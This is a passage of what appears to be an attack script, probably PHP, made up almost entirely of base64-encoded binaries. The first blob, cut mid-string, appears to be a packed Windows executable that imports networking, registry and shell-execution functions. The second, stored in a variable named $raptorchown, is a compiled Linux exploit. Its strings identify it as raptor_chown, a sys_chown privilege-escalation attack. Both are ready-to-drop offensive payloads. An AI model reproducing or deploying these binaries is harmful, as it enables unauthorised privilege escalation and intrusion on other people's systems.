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 +AGHp+DP//6y9QQC0vUEAfBZBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAA9qgMxAAAAAAAAAwADAAAAKAAAgAoAAABoAACADgAAANgAAIAAAAAAPaoDMQAAAAAAAAEA +AQAAAEAAAIAAAAAAPaoDMQAAAAAAAAEAGAQAAFgAAABUwQEA6AIAAAAAAAAAAAAAAAAAAD2qAzEA +AAAAAgAAABgBAICIAACAJgEAgLAAAIAAAAAAPaoDMQAAAAAAAAEAAAAAAKAAAAA4lAEAEAAAAAAA +AAAAAAAAAAAAAD2qAzEAAAAAAAABAAAAAADIAAAASJQBAIQAAAAAAAAAAAAAAAAAAAA9qgMxAAAA +AAEAAAA+AQCA8AAAgAAAAAA9qgMxAAAAAAAAAQAYBAAACAEAAEDEAQAUAAAAAAAAAAAAAAAGAEQA +VgBDAEwAQQBMAAsAUABBAEMASwBBAEcARQBJAE4ARgBPAAgATQBBAEkATgBJAEMATwBOAFCRAQAo +AAAAIAAAAEAAAAABAAQAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAA +AACAAIAAgIAAAICAgADAwMAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAd3d3d3d3d3d3d3d3d3d3cHiIiIiIiIiIiIiIiIiIiHB4f/// +//////////////hweH/////////////////4cHh/////////////////+HB4f/////////////// +//hweH/////////////////4cHh/////////////////+HB4f/////////////////hweH////// +///////////4cHh/////////////////+HB4f/////////////////hweH/////////////////4 +cHh/////////////////+HB4f/////////////////hweH/////////////////4cHh///////// +////////+HB4f/////////////////hweH/////////////////4cHh/////////////////+HB4 +d3d3d3d3d3d3d3d3d3hweIiIiIiIiIiIiIiIiIiIcHhERERERERERERAAAAAAHB4RERERERERERE +SICICIBweEREREREREREREiAiAiAcHhERERERERERERERERERHB4iIiIiIiIiIiIiIiIiIhwd3d3 +d3d3d3d3d3d3d3d3cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//////// +///MlAEAAAABAAEAICAEAAEABADoAgAAAQAAAAAAAAAAAAAAAABQxQEACMUBAAAAAAAAAAAAAAAA +AF3FAQAYxQEAAAAAAAAAAAAAAAAAasUBACDFAQAAAAAAAAAAAAAAAAB0xQEAKMUBAAAAAAAAAAAA +AAAAAIHFAQAwxQEAAAAAAAAAAAAAAAAAjcUBADjFAQAAAAAAAAAAAAAAAACYxQEAQMUBAAAAAAAA +AAAAAAAAAKTFAQBIxQEAAAAAAAAAAAAAAAAAAAAAAAAAAACwxQEAvsUBAM7FAQAAAAAA3MUBAAAA +AADqxQEAAAAAAPTFAQAAAAAABMYBAAAAAAAUxgEAAAAAAB7GAQAAAAAALsYBAAAAAABLRVJORUwz +Mi5ETEwAYWR2YXBpMzIuZGxsAGdkaTMyLmRsbABvbGVhdXQzMi5kbGwAc2hlbGwzMi5kbGwAdXNl +cjMyLmRsbAB3aW5pbmV0LmRsbAB3c29jazMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0Fk +ZHJlc3MAAEV4aXRQcm9jZXNzAAAAUmVnRW51bUtleUEAAABUZXh0T3V0QQAAU3lzRnJlZVN0cmlu +ZwAAAFNoZWxsRXhlY3V0ZUEAAABTZXRGb2N1cwAASW50ZXJuZXRPcGVuQQAAAHNlbmdfb08/q3OiZ0eXTbpynnqlyfKdzc3NiXaFemV+lYJ1tYVdh1OXK1tbYm9vo02Hp8MnR0+SWzNnY +ZVtSoFJcTlRPp5avqVzj4NrWosfQ1VBaUFrzrZi+wZ2ooauorLiWqJK8rLazkrimo5mVmJq3rquX +tKahmaip8li6s8aGztfv2s7TzFysw7iMwNPh3NrL2FQ="; + +$raptorchown="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 +Q29weXJpZ2h0IChjKSAyMDA0IE1hcmNvIEl2YWxkaSA8cmFwdG9yQDB4ZGVhZGJlZWYuaW5mbz4A +AAAAAAAAAHJhcHRvcl9jaG93bi5jIC0gc3lzX2Nob3duIG1pc3NpbmcgREFDIGNvbnRyb2xzIG9u +IExpbnV4ACVzCiVzCgoAdXNhZ2U6ICVzIGZpbGVfbmFtZQoKAEVycm9yOiBOb3QgdnVsbmVyYWJs +ZSEKAEVycm9yAE5pbnBvdTogc3lzX2Nob3duIG5vIGp1dHN1IQoAL2Jpbi9scyAtbCAlcwAAAAAA +AAAAAOSYBAgAAAAAAQAAAAEAAAAMAAAAnIMECA0AAADIhgQIBAAAAEiBBAgFAAAAYIIECAYAAACQ +gQQICgAAAJcAAAALAAAAEAAAABUAAAAAAAAAAwAAAOyYBAgCAAAASAAAABQAAAARAAAAFwAAAFSD +BAgRAAAARIMECBIAAAAQAAAAEwAAAAgAAAD+//9vFIMECP///28BAAAA8P//b/iCBAgAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAA +AAAAABCYBAgAAAAAAAAAAMqDBAjagwQI6oMECPqDBAgKhAQIGoQECCqEBAg6hAQISoQECAAAAAAA +R0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABH +Q0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdD +QzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAALnN5 +bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5bnN5 +bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAu +aW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA +LmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAAABSBBAgUAQAAEwAAAAAAAAAAAAAAAQAAAAAAAAAj +AAAABwAAAAIAAAAogQQIKAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAMQAAAAUAAAACAAAASIEECEgB +AABIAAAABAAAAAAAAAAEAAAABAAAADcAAAALAAAAAgAAAJCBBAiQAQAA0AAAAAUAAAABAAAABAAA +ABAAAAA/AAAAAwAAAAIAAABgggQIYAIAAJcAAAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28CAAAA ++IIECPgCAAAaAAAABAAAAAAAAAACAAAAAgAAAFQAAAD+//9vAgAAABSDBAgUAwAAMAAAAAUAAAAB +AAAABAAAAAAAAABjAAAACQAAAAIAAABEgwQIRAMAABAAAAAEAAAAAAAAAAQAAAAIAAAAbAAAAAkA +AAACAAAAVIMECFQDAABIAAAABAAAAAsAAAAEAAAACAAAAHUAAAABAAAABgAAAJyDBAicAwAAFwAA +AAAAAAAAAAAABAAAAAAAAABwAAAAAQAAAAYAAAC0gwQItAMAAKAAAAAAAAAAAAAAAAQAAAAEAAAA +ewAAAAEAAAAGAAAAVIQECFQEAAB0AgAAAAAAAAAAAAAEAAAAAAAAAIEAAAABAAAABgAAAMiGBAjI +BgAAGwAAAAAAAAAAAAAABAAAAAAAAACHAAAAAQAAAAIAAAAAhwQIAAcAAAABAAAAAAAAAAAAACAA +AAAAAAAAjwAAAAEAAAADAAAAAJgECAAIAAAMAAAAAAAAAAAAAAAEAAAAAAAAAJUAAAABAAAAAgAA +AAyYBAgMCAAABAAAAAAAAAAAAAAABAAAAAAAAACfAAAABgAAAAMAAAAQmAQIEAgAAMgAAAAFAAAA +AAAAAAQAAAAIAAAAqAAAAAEAAAADAAAA2JgECNgIAAAIAAAAAAAAAAAAAAAEAAAAAAAAAK8AAAAB +AAAAAwAAAOCYBAjgCAAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAAAQAAAAMAAADomAQI6AgAAAQA +AAAAAAAAAAAAAAQAAAAAAAAAuwAAAAEAAAADAAAA7JgECOwIAAA0AAAAAAAAAAAAAAAEAAAABAAA +AMAAAAAIAAAAAwAAACCZBAggCQAACAAAAAAAAAAAAAAABAAAAAAAAADFAAAAAQAAAAAAAAAAAAAA +IAkAAKgAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMgJAADOAAAAAAAAAAAAAAAB +AAAAAAAAAAEAAAACAAAAAAAAAAAAAADQDgAA0AQAABoAAAArAAAABAAAABAAAAAJAAAAAwAAAAAA +AAAAAAAAoBMAANcCAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQIAAAA +AAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAACQgQQIAAAAAAMABAAAAAAA +YIIECAAAAAADAAUAAAAAAPiCBAgAAAAAAwAGAAAAAAAUgwQIAAAAAAMABwAAAAAARIMECAAAAAAD +AAgAAAAAAFSDBAgAAAAAAwAJAAAAAACcgwQIAAAAAAMACgAAAAAAtIMECAAAAAADAAsAAAAAAFSE +BAgAAAAAAwAMAAAAAADIhgQIAAAAAAMADQAAAAAAAIcECAAAAAADAA4AAAAAAACYBAgAAAAAAwAP +AAAAAAAMmAQIAAAAAAMAEAAAAAAAEJgECAAAAAADABEAAAAAANiYBAgAAAAAAwASAAAAAADgmAQI +AAAAAAMAEwAAAAAA6JgECAAAAAADABQAAAAAAOyYBAgAAAAAAwAVAAAAAAAgmQQIAAAAAAMAFgAA +AAAAAAAAAAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAA +AAADABoAAQAAAHiEBAgAAAAAAgAMABEAAAAAAAAAAAAAAAQA8f8cAAAA2JgECAAAAAABABIAKgAA +AOCYBAgAAAAAAQATADgAAADomAQIAAAAAAEAFABFAAAACJgECAAAAAABAA8ASQAAACSZBAgBAAAA +AQAWAFUAAACchAQIAAAAAAIADABrAAAA2IQECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/3cAAADc +mAQIAAAAAAEAEgCEAAAA5JgECAAAAAABABMAkQAAAAyYBAgAAAAAAQAQAJ8AAADomAQIAAAAAAEA +FACrAAAApIYECAAAAAACAAwAwQAAAAAAAAAAAAAABADx/9AAAAAAAAAA4AAAABIAAADhAAAAEJgE 